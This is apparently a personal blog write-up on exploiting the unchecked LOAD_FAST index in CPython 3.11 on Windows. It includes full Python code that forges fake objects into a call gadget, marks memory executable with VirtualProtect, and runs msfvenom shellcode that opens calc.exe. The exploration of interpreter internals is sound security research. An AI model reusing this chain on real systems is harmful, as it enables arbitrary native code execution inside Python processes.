Abusing LOAD_FAST in Python 3 VM

Metadata

A while ago, I read this article about abusing LOAD_CONST in Python 2.7. We are in Python 3.11 now, and CPython has since implemented quite a lot more features and checks. I wanna try to abuse the Python 3 VM to similarly execute shellcode, but I wanna do so without crashing CPython.

Some things to note first:

Just like the case for LOAD_CONST in Python 2, the bug I abused in LOAD_FAST in Python 3 is known. It's even in the name! It's just way faster to leave that bug there.
I mean there's the ctypes module that allows you to do literally anything. But that's not fun at all.
I did not know anything about the Python interpreter prior to starting this. I've written some high level explanation of how CPython does things below, hopefully it's correct and helpful for anybody just starting.
- Also CPython source is just so easy to read. It's been a joy.

Since I wanna try this on the newest Python, I cloned CPython and built the x64 Debug and Release version of CPython. At the time of writing that version would be Python 3.11.0a0. I'll also be doing all this in Windows.

A Very Brief Introduction

So this post won't really make sense if not for some background about CPython. The way python interprets is by compiling a python script into Python bytecode. These bytecode are instructions which are executed by the Python VM.

A unique thing about Python bytecode is that unlike CPU bytecode, which is really low level, Python bytecode is really high level (surprise!). Everything that a Python bytecode instruction acts on is a PyObject, which is everything in Python, including your str, int, list, dict, etc.

This makes Python bytecode really easy to read. E.g. A BINARY_ADD instruction on two strings a and b will simply be a+b, or the concatenation of a and b, exactly what you would expect in Python.

The bytecode is represented as a PyCodeObject, and contains fields specific to the bytecode, such as co_const, which contains the constants used in the bytecode. The CPython source code provides some very useful documentation for the fields:

// include/cpython/code.h:17

/* Bytecode object */
struct PyCodeObject {
    PyObject_HEAD
    int co_argcount;            /* #arguments, except *args */
    int co_posonlyargcount;     /* #positional only arguments */
    int co_kwonlyargcount;      /* #keyword only arguments */
    int co_nlocals;             /* #local variables */
    int co_stacksize;           /* #entries needed for evaluation stack */
    int co_flags;               /* CO_..., see below */
    int co_firstlineno;         /* first source line number */
    PyObject *co_code;          /* instruction opcodes */
    PyObject *co_consts;        /* list (constants used) */
    PyObject *co_names;         /* list of strings (names used) */
    PyObject *co_varnames;      /* tuple of strings (local variable names) */
    PyObject *co_freevars;      /* tuple of strings (free variable names) */
    PyObject *co_cellvars;      /* tuple of strings (cell variable names) */
    /* The rest aren't used in either hash or comparisons, except for co_name,
       used in both. This is done to preserve the name and line number
       for tracebacks and debuggers; otherwise, constant de-duplication
       would collapse identical functions/lambdas defined on different lines.
    */
    Py_ssize_t *co_cell2arg;    /* Maps cell vars which are arguments. */
    PyObject *co_filename;      /* unicode (where it was loaded from) */
    PyObject *co_name;          /* unicode (name, for reference) */
    PyObject *co_linetable;     /* string (encoding addr<->lineno mapping) See
                                   Objects/lnotab_notes.txt for details. */
    PyObject *co_exceptiontable; /* Byte string encoding exception handling table */
    void *co_zombieframe;       /* for optimization only (see frameobject.c) */
    PyObject *co_weakreflist;   /* to support weakrefs to code objects */
    /* Scratch space for extra data relating to the code object.
       Type is a void* to keep the format private in codeobject.c to force
       people to go through the proper APIs. */
    void *co_extra;

    /* Per opcodes just-in-time cache
     *
     * To reduce cache size, we use indirect mapping from opcode index to
     * cache object:
     *   cache = co_opcache[co_opcache_map[next_instr - first_instr] - 1]
     */

    // co_opcache_map is indexed by (next_instr - first_instr).
    //  * 0 means there is no cache for this opcode.
    //  * n > 0 means there is cache in co_opcache[n-1].
    unsigned char *co_opcache_map;
    _PyOpcache *co_opcache;
    int co_opcache_flag;  // used to determine when create a cache.
    unsigned char co_opcache_size;  // length of co_opcache.
};

However, Python bytecode requires a sort of context in which to execute. The bytecode executes with its own stack, constants, namespace and other variables that changes depending on where you are executing. Take for instance:

def f(a):
    print(a)
print(a)

The variable a in the function f is defined while the one outside isn't. So how does Python deal with different execution context?

The answer is in frames. CPython creates frames to execute a chunk of bytecode in its context. Hence each frame would contain stuff like the stack, constants, namespace, etc that the bytecode uses.

// include/cpython/frameobject.h:22

struct _frame {
    PyObject_VAR_HEAD
    struct _frame *f_back;      /* previous frame, or NULL */
    PyCodeObject *f_code;       /* code segment */
    PyObject *f_builtins;       /* builtin symbol table (PyDictObject) */
    PyObject *f_globals;        /* global symbol table (PyDictObject) */
    PyObject *f_locals;         /* local symbol table (any mapping) */
    PyObject **f_valuestack;    /* points after the last local */
    PyObject *f_trace;          /* Trace function */
    /* Borrowed reference to a generator, or NULL */
    PyObject *f_gen;
    int f_stackdepth;           /* Depth of value stack */
    int f_lasti;                /* Last instruction if called */
    int f_lineno;               /* Current line number. Only valid if non-zero */
    PyFrameState f_state;       /* What state the frame is in */
    char f_trace_lines;         /* Emit per-line trace events? */
    char f_trace_opcodes;       /* Emit per-opcode trace events? */
    PyObject *f_localsplus[1];  /* locals+stack, dynamically sized */
};

This is important as the instruction I'm about to abuse, LOAD_FAST, requires getting the address of _frame.f_localsplus as you'll see later.

So far I've given a very high level overview of how Python interprets. If you would like to know more I highly recommend reading this amazing resource, and the article I linked to above, which steps through the bytecode in WinDbg.

Planning the Attack

So of course I didn't settle for abusing LOAD_FAST immediately. I first looked at LOAD_CONST and some other opcodes.

LOAD_CONST <idx> loads a PyObject from the constants (PyCodeObject.co_const) onto the python VM stack. Meanwhile LOAD_FAST <idx>, loads a PyObject from the locals (_frame.f_localsplus).

LOAD_CONST was totally abusable in Python 2. However Python 3 decided to fix it.

Python 2:

#define PyTuple_GET_ITEM(op, i) (((PyTupleObject *)(op))->ob_item[i])
#define GETITEM(v, i) PyTuple_GET_ITEM((PyTupleObject *)(v), (i))

/* ... */

case LOAD_CONST:
  x = GETITEM(consts, oparg);
  Py_INCREF(x);
  PUSH(x);
  goto fast_next_opcode;

Python 3:

PyObject *
PyTuple_GetItem(PyObject *op, Py_ssize_t i)
{
    if (!PyTuple_Check(op)) {
        PyErr_BadInternalCall();
        return NULL;
    }
    if (i < 0 || i >= Py_SIZE(op)) {
        PyErr_SetString(PyExc_IndexError, "tuple index out of range");
        return NULL;
    }
    return ((PyTupleObject *)op) -> ob_item[i];
}

/* ... */

#define GETITEM(v, i) PyTuple_GetItem((v), (i))

/* ... */

case TARGET(LOAD_CONST): {
    PREDICTED(LOAD_CONST);
    PyObject *value = GETITEM(consts, oparg);
    Py_INCREF(value);
    PUSH(value);
    DISPATCH();
}

As you can see, they changed direct array indexing in Python 2 to creating a proper PyTuple for the constants and indexing it.

This means that LOAD_CONST in Python 3 would actually check for out-of-bounds and handle it gracefully, returning the familiar IndexError: tuple index out of range exception.

Since we control the value of oparg, it would have been possible to index way out of bounds and read practically anything in memory in Python 2, which won't be possible in Python 3.

Having realised that, I then goofed around with some other opcodes and eventually went back to LOAD_FAST, and true to it's name, it loads really quickly because it indexes an array directly:

Python 3:

#define GETLOCAL(i)     (fastlocals[i])

/* ... */

case TARGET(LOAD_FAST): {
    PyObject *value = GETLOCAL(oparg);
    if (value == NULL) {
        format_exc_check_arg(tstate, PyExc_UnboundLocalError,
                                UNBOUNDLOCAL_ERROR_MSG,
                                PyTuple_GetItem(co->co_varnames, oparg));
        goto error;
    }
    Py_INCREF(value);
    PUSH(value);
    DISPATCH();
}

fastlocals is actually the aforementioned _frame.f_localsplus. It is specific to the frame and stores the local variables of said frame (surprise 2.0!). Since we again control the variable oparg, we can easily index way beyond fastlocals to anywhere we want in memory. Let's verify this quickly with a crash from indexing somewhere invalid in memory:

# Python 3.11.0a0

import opcode
import types

def inst(opc:str, arg:int=0):

    "Makes life easier in writing python bytecode"

    nb = max(1,-(-arg.bit_length()//8))
    ab = arg.to_bytes(nb, 'big')
    ext_arg = opcode.opmap['EXTENDED_ARG']
    inst = bytearray()
    for i in range(nb-1):
        inst.append(ext_arg)
        inst.append(ab[i])
    inst.append(opcode.opmap[opc])
    inst.append(ab[-1])
    
    return bytes(inst)

crash_bytecode = b"".join([
    inst('LOAD_FAST', 0xdeadbeef), # Index _somewhere_ in memory
    inst('RETURN_VALUE')
])

def g(): pass
def assign_bytecode(bytecode): 
    global g
    g.__code__ = types.CodeType(
        0, # argcount
        0, # posonlyargcount
        0, # kwonlyargcount
        20, # nlocals (big enough)
        20, # stacksize (big enough)
        0, # flags
        bytecode, # codestring
        (), # constants
        (), # names
        (), # varnames
        "", # filename
        "", # name
        0, # firstlineno
        b"", # linetable
        b"", # exceptiontable
    )

assign_bytecode(crash_bytecode)
g() # Crash!

Windbg logging the crash:

(5118.3268): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.

python311!_PyEval_EvalFrameDefault+0x42c:
00007ff8`1b4f756c 498b44d668      mov     rax,qword ptr [r14+rdx*8+68h] ds:000001c5`343c00e0=????????????????
0:000> ?rdx
Evaluate expression: -559038737 = ffffffff`deadbeef

Abusing `LOAD_FAST`

Indexing into Known Memory

We first need to get the address of the frame at which the instruction LOAD_FAST <index> is going to be ran. We can do this by calling sys._getframe() which returns the current frame object, and then calling id on it. CPython actually returns the pointer to the PyObject when you call id on it so that's very convenient.

>>> help(id)
Help on built-in function id in module builtins:

id(obj, /)
    Return the identity of an object.

    This is guaranteed to be unique among simultaneously existing objects.
    (CPython uses the object's memory address.)

We need the address of the current executing frame so we actually know where we are indexing into, and we need the address of the same frame because the address of fastlocals changes according to which frame we are in.

My first thought was to get the address of the frame, calculate the index we want in order to read a predefined memory location, modify a global PyBytesObject object that contains the instruction LOAD_FAST <index> and use the opcode JUMP_FORWARD to jump way past the frame's code object into that global PyBytesObject and continue executing from there. And viola! Everything happens in the same frame and the address of fastlocals stays the same.

Then I realised you can actually replace the bytecode of the frame, without deallocating the frame, meaning its address stays the same!

def g(): pass
def assign_bytecode(bytecode): 
    global g
    g.__code__ =  types.CodeType(
        0, # argcount
        0, # posonlyargcount
        0, # kwonlyargcount
        20, # nlocals (big enough)
        20, # stacksize (big enough)
        0, # flags
        bytecode, # codestring
        (id, sys._getframe), # constants
        (), # names
        ('a',), # varnames
        "", # filename
        "", # name
        0, # firstlineno
        b"", # linetable
        b"", # exceptiontable
    )

# Runs `return id(sys._getframe())`
bytecode = b"".join([
    # Get address of its frame and return
    inst('LOAD_CONST', 0), # Load id
    inst('LOAD_CONST', 1), # Load sys._getframe
    inst('CALL_FUNCTION', 0),
    inst('CALL_FUNCTION', 1),
    inst('RETURN_VALUE')
])

assign_bytecode(bytecode)
print("Frame1 Address:", hex(frame_addr1 := g()))

assign_bytecode(inst('NOP')+bytecode) # Replace the bytecode of g
print("Frame2 Address:", hex(frame_addr2 := g()))

assert frame_addr1 == frame_addr2

# Output:
# > Frame1 Address: 0x151a34945f0
# > Frame2 Address: 0x151a34945f0

This means we can simply get the frame address, calculate the index we need outside of the frame, then replace the bytecode of the frame with the actual exploit LOAD_FAST <index>. Which is so much easier!

To test this we'll try to access any PyObject we want in memory. However, do note that _frame.f_localsplus has type PyObject **, which means that we want the memory we index into to be be a pointer to a PyObject. We can do this by creating a PyBytesObject to store the address of the PyObject we wanna access, and make LOAD_FAST access the data field (PyBytesObject.ob_sval) of PyBytesObject:

# Arbituary Object
arb_object = "Hello! ^-^"

# PyBytesObject that contains the address of `object`
PyBytesObject_arb_object_addr = id(arb_object).to_bytes(8, 'little')

# Offset of PyBytesObject.ob_sval
PyBytesObject_ob_sval_offset = 0x20
# Address to data of `object_addr_PyBytesObject`, 
# which is equivalent to `&(&object)`
arb_object_ptr_ptr = id(PyBytesObject_arb_object_addr) + PyBytesObject_ob_sval_offset

We can then calculate the idx for LOAD_CONST <idx> to access object_ptr_ptr:

# Runs `return id(sys._getframe())`
bytecode1 = b"".join([
    # Get address of its frame and return
    inst('LOAD_CONST', 0), # Load id
    inst('LOAD_CONST', 1), # Load sys._getframe
    inst('CALL_FUNCTION', 0),
    inst('CALL_FUNCTION', 1),
    inst('RETURN_VALUE')
])

# Returns *(fastlocals[idx])
bytecode2 = lambda idx: b"".join([
    inst('LOAD_FAST', idx),
    inst('RETURN_VALUE')
])

# Get frame address by loading bytecode1
assign_bytecode(bytecode1)
print("Frame1 Address:", hex(frame_addr := g()))

# Offset of _frame.f_localsplus
_frame_f_localsplus_offset = 0x68
# Calculate idx
# r14+rdx*8+68h --> arb_object_ptr_ptr = 
#   frame_addr + idx*8 + _frame_f_localsplus_offset
idx = (arb_object_ptr_ptr - _frame_f_localsplus_offset - frame_addr)//8
print("idx:", hex(idx))
assert 0 <= idx < (1<<32), "idx out of range!"

# Replace the bytecode of g to return *(fastlocals[idx])
assign_bytecode(bytecode2(idx))

# Attempt to return `arb_object`
print("arb_object:", g())

# Output
# > Frame1 Address: 0x1eb158945f0
# > idx: 0x640db
# > arb_object: Hello! ^-^

Success! We managed to access arb_object from g() via abusing LOAD_FAST!

A caveat though, is that we can't access all memory (at least in 64 bit). oparg is stored as a 4 bytes int, which means that idx cannot be more than 4 bytes. And it can't be negative either, so we can't index backwards.

This is a different story in 32-bit Python though. Since the address space is 32 bits as well, we can overflow and effectively index backwards. If you're curious you should totally try that out.

Being able to index practically anywhere in memory and having CPython interprete it as a PyObject, means that we could create a fake PyObject in memory, controlling all the fields we want by adding the data anywhere we want and have LOAD_FAST access it. What we are gonna do with this is to make CPython call any address we want, aka a call gadget.

Creating an arbituary call gadget

Scrolling through the opcodes, DELETE_DEREF makes for a really clean call gadget as there are minimal checks.

void
_Py_Dealloc(PyObject *op)
{
    destructor dealloc = Py_TYPE(op)->tp_dealloc;
#ifdef Py_TRACE_REFS
    _Py_ForgetReference(op);
#endif
    (*dealloc)(op); // <-- Hell yea
}

/* ... */

case TARGET(DELETE_DEREF): {
    PyObject *cell = freevars[oparg];
    PyObject *oldobj = PyCell_GET(cell);
    if (oldobj != NULL) {
        PyCell_SET(cell, NULL);
        Py_DECREF(oldobj); // <-- Calls _Py_Dealloc
        DISPATCH();
    }
    format_exc_unbound(tstate, co, oparg);
    goto error;
}

All we have to do is create a fake PyObject whose PyTypeObject.tp_dealloc contains the address we want. It's really clean!

Though in the spirit of the original post, (and because I wanna return a PyFunctionObject I can move around in regular python code and call anytime for aesthetic reasons), I'll be using CALL_FUNCTION, which is quite a bit more involved.

So let's look at the source code to see which fields of the PyFunctionObject need to be spoofed:

#define Py_TYPE(ob)             (_PyObject_CAST(ob)->ob_type)

/* ... */

int
PyCallable_Check(PyObject *x)
{
    if (x == NULL)
        return 0;
    return Py_TYPE(x)->tp_call != NULL;
}

/* ... */

static inline vectorcallfunc
PyVectorcall_Function(PyObject *callable)
{
    PyTypeObject *tp;
    Py_ssize_t offset;
    vectorcallfunc ptr;

    assert(callable != NULL);
    // vvv Our PyFunctionObject needs to have a PyTypeObject
    tp = Py_TYPE(callable);
    if (!PyType_HasFeature(tp, Py_TPFLAGS_HAVE_VECTORCALL)) {
        return NULL;
    }
    // vvv Its PyTypeObject needs to have tp_call not null
    assert(PyCallable_Check(callable));
    // vvv callable+offset contains address of of function to run
    offset = tp->tp_vectorcall_offset;
    assert(offset > 0);
    memcpy(&ptr, (char *) callable + offset, sizeof(ptr));
    return ptr; // <-- ptr is the address CPython will call at.
}

/* ... */

static inline PyObject *
_PyObject_VectorcallTstate(PyThreadState *tstate, PyObject *callable,
                           PyObject *const *args, size_t nargsf,
                           PyObject *kwnames)
{
    vectorcallfunc func;
    PyObject *res;

    assert(kwnames == NULL || PyTuple_Check(kwnames));
    assert(args != NULL || PyVectorcall_NARGS(nargsf) == 0);

    func = PyVectorcall_Function(callable);
    if (func == NULL) { // <-- Don't care
        /* ... */
    }
    res = func(callable, args, nargsf, kwnames); // <-- Our call gadget!!
    // ^ note that `res` is a PyObject*
    return _Py_CheckFunctionResult(tstate, callable, res, NULL);
}

/* ... */

static inline PyObject *
PyObject_Vectorcall(PyObject *callable, PyObject *const *args,
                     size_t nargsf, PyObject *kwnames)
{
    PyThreadState *tstate = PyThreadState_Get();
    return _PyObject_VectorcallTstate(tstate, callable,
                                      args, nargsf, kwnames);
}

/* ... */

Py_LOCAL_INLINE(PyObject *) _Py_HOT_FUNCTION
call_function(PyThreadState *tstate,
              PyTraceInfo *trace_info,
              PyObject ***pp_stack,
              Py_ssize_t oparg,
              PyObject *kwnames)
{
    PyObject **pfunc = (*pp_stack) - oparg - 1;
    PyObject *func = *pfunc;
    PyObject *x, *w;
    Py_ssize_t nkwargs = (kwnames == NULL) ? 0 : PyTuple_GET_SIZE(kwnames);
    Py_ssize_t nargs = oparg - nkwargs;
    PyObject **stack = (*pp_stack) - nargs - nkwargs;

    if (trace_info->cframe.use_tracing) { // <-- Don't care
        /* ... */
    }
    else {  // <-- Yes this is important
        x = PyObject_Vectorcall(func, stack, nargs | PY_VECTORCALL_ARGUMENTS_OFFSET, kwnames);
    }

    assert((x != NULL) ^ (_PyErr_Occurred(tstate) != NULL));

    /* Clear the stack of the function object. */
    while ((*pp_stack) > pfunc) {
        w = EXT_POP(*pp_stack);
        Py_DECREF(w);
    }

    return x;
}

/* ... */

case TARGET(CALL_FUNCTION): {
    PREDICTED(CALL_FUNCTION);
    PyObject **sp, *res;
    sp = stack_pointer;
    res = call_function(tstate, &trace_info, &sp, oparg, NULL);
    stack_pointer = sp;
    PUSH(res);
    if (res == NULL) {
        goto error;
    }
    CHECK_EVAL_BREAKER();
    DISPATCH();
}

I've put (and commented) the relevant source so you can figure out for urself but here's the summary:

Let PyObject *callable be the pointer to our PyFunctionObject and tp be the PyObjectType*, callable->ob_type.

tp->tp_flags to have Py_TPFLAGS_HAVE_VECTORCALL bit set.
tp->tp_call to have to be non-zero
tp->tp_vectorcall_offset + callable is to contain the address of the shellcode.

So creating the tp:

# PyBytesObject.ob_sval offset, the offset to our actual bytes
PyBytesObject_ob_sval_offset = 0x20

fake_typeobject = bytearray(b'A'*0x190)
fake_typeobject[0x038:0x038+8] = (0x10).to_bytes(8, 'little') # tp_vectorcall_offset
fake_typeobject[0x080:0x080+8] = (0x1).to_bytes(8, 'little') # tp_call
fake_typeobject[0x0a8:0x0a8+8] = (0x800).to_bytes(8, 'little') # tp_flags
fake_typeobject = bytes(fake_typeobject)
fake_typeobject_addr = id(fake_typeobject) + PyBytesObject_ob_sval_offset

Creating callable:

shellcode = b"\xCC Hello Success!!!" # <-- breakpoint (int 3)
shellcode_addr = id(shellcode) + PyBytesObject_ob_sval_offset

fake_callable = bytearray(b'a'*0x18)
fake_callable[0x008:0x008+8] = fake_typeobject_addr.to_bytes(8, 'little') # ob_type
fake_callable[0x010:0x010+8] = shellcode_addr.to_bytes(8, 'little') # shellcode
fake_callable = bytes(fake_callable)
fake_callable_addr = id(fake_callable) + PyBytesObject_ob_sval_offset

Abusing LOAD_FAST to load fake_callable:

control_data = fake_callable_addr.to_bytes(8,'little')
control_data_addr = id(control_data) + PyBytesObject_ob_sval_offset

# Runs `return id(sys._getframe())`
bytecode1 = b"".join([
    # Get address of its frame and return
    inst('LOAD_CONST', 0), # Load id
    inst('LOAD_CONST', 1), # Load sys._getframe
    inst('CALL_FUNCTION', 0),
    inst('CALL_FUNCTION', 1),
    inst('RETURN_VALUE')
])

# Returns *(fastlocals[idx])
bytecode2 = lambda idx: b"".join([
    inst('LOAD_FAST', idx),
    inst('RETURN_VALUE')
])

# Get frame address by loading bytecode1
assign_bytecode(bytecode1)
frame_addr = g()
print("frame addr:", hex(frame_addr))

# Offset of _frame.f_localsplus
_frame_f_localsplus_offset = 0x68
# offset + frame_addr + idx*ptr_size = addr
# idx = (addr - offset - frame_addr)//ptr_size
idx = (control_data_addr - _frame_f_localsplus_offset - frame_addr)//8
print("index:", hex(idx))
assign_bytecode(bytecode2(idx))

# Returns our call gadget
run = g()

# Run our call gadget
run()

Running it in WinDbg we get:

(5b78.4910): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
00000211`f8108290 cc              int     3
0:000> da
00000211`f8108290  ". Hello Success!!!"

And success!! We made CPython jump to shellcode!

Not Yet

You might notice that the error for the crash above is c0000005 and not 80000003. This means that we are getting an Access violation rather than a Break instruction exception as expected when executing an int 3 instruction. This is because of page permissions:

0:000> !address rip

Usage:                  <unknown>
Base Address:           00000211`f8070000
End Address:            00000211`f8170000
Region Size:            00000000`00100000 (   1.000 MB)
State:                  00001000          MEM_COMMIT
Protect:                00000004          PAGE_READWRITE // <-- No execute :(
Type:                   00020000          MEM_PRIVATE
Allocation Base:        00000211`f8070000
Allocation Protect:     00000004          PAGE_READWRITE


Content source: 1 (target), length: 67d70

The page does not have execute permission. We can maybe find some fancy gadget to ROP our way out of this or smth but at this point I'm lazy so I just used ctypes to change the page permissions. It's boring.

VirtualProtect = ctypes.windll.kernel32.VirtualProtect
old = ctypes.c_long(1)
res = VirtualProtect(
    ctypes.c_void_p(shellcode_addr), 
    len(shellcode), 0x40, ctypes.byref(old))

But it works!

(76e4.2b68): Break instruction exception - code 80000003 (first chance)
0000011c`74f882d0 cc              int     3
0:000> da
0000011c`74f882d0  ". Hello Success!!!"

Crafting our Shellcode

We're gonna try running shellcode that calls WinExec to execute commands. I used msfvenom:

> msfvenom -p windows/x64/exec CMD="calc.exe" EXITFUNC=none -f python

shellcode =  b""
shellcode += b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41"
shellcode += b"\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48"
shellcode += b"\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f"
shellcode += b"\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c"
shellcode += b"\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52"
shellcode += b"\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b"
shellcode += b"\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0"
shellcode += b"\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56"
shellcode += b"\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9"
shellcode += b"\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0"
shellcode += b"\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58"
shellcode += b"\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
shellcode += b"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0"
shellcode += b"\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
shellcode += b"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
shellcode += b"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00"
shellcode += b"\x00\x00\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41"
shellcode += b"\xba\x31\x8b\x6f\x87\xff\xd5\xbb\xaa\xc5\xe2\x5d\x41"
shellcode += b"\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06"
shellcode += b"\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"
shellcode += b"\x00\x59\x41\x89\xda\xff\xd5"
shellcode += b"calc.exe\x00" # <-- The command!

Attempting to run that successfully opens calc.exe but results in a crash in CPython:

(14b0.2714): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
000001e1`1696d51b 63616c          movsxd  esp,dword ptr [rcx+6Ch] ds:00000000`0000006c=????????
0:000> da
000001e1`1696d51b  "calc.exe"

It attempted to run calc.exe! Also remember how this shellcode should return a PyObject* so that CPython doesn't crash? Furthermore, msfvenom shellcode destroys the stack and some important registers (The audacity!). Hence, to ensure it doesn't crash we'd need to:

Move the stack pointer forward
Push a bunch of important registers
Run the shellcode
Restore the stack
Pop the important registers back
Move the stack pointer backwards to its original place
Move the pointer of a random PyObject into rax
Return

The calc.exe also has to be moved forward to allow space for steps 4-8, so pointers in the shellcode also has to be patched. Here's what it looks like:

retobj = "Success!! ^-^"
shellcode = b"".join([

    b"\x48\x81\xec\x00\x10\x00\x00", # sub rsp,0x1000
    b"\x50\x53\x51\x52\x55", # push rax, rbx, rcx, rdx, rbp
    
    # msfvenom -p windows/x64/exec CMD="calc.exe" EXITFUNC=none -f python
    # Modified to not crash the interpreter, 
    # at least until it finishes running this file.
    b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41",
    b"\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48",
    b"\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f",
    b"\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c",
    b"\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52",
    b"\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b",
    b"\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0",
    b"\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56",
    b"\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9",
    b"\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0",
    b"\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58",
    b"\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44",
    b"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0",
    b"\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a",
    b"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48",
    b"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00",
    b"\x00\x00\x00\x00\x00\x48\x8d\x8d\x1f\x01\x00\x00\x41",
    b"\xba\x31\x8b\x6f\x87\xff\xd5\xbb\xaa\xc5\xe2\x5d\x41",
    b"\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06",
    b"\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a",
    b"\x00\x59\x41\x89\xda\xff\xd5",

    b"\x48\x81\xc4\x38\x00\x00\x00", # add rsp,0x38
    b"\x5D\x5A\x59\x5B\x58", # pop rax, rbx, rcx, rdx, rbp
    b"\x48\x81\xc4\x00\x10\x00\x00", # add rsp,0x1000
    b"\x48\xb8" + id(retobj).to_bytes(8, 'little'), # mov rax, <retobj addr>
    b"\xc3", # ret

    b"calc.exe\x00",

])

# ...

# Returns our call gadget
run = g()

# Run our call gadget
print(run())

# Output:
# > Success!! ^-^

And it's done! If you want to see the full script to run the exploit, see here!

CPython actually crashes when the program ends in the garbage collector. And that's because our PyFuncObject and its PyTypeObject is so hopelessly malformed.

Final Thoughts

I would have had stuff to write here if I didn't procrastinate writing this article for a whole week.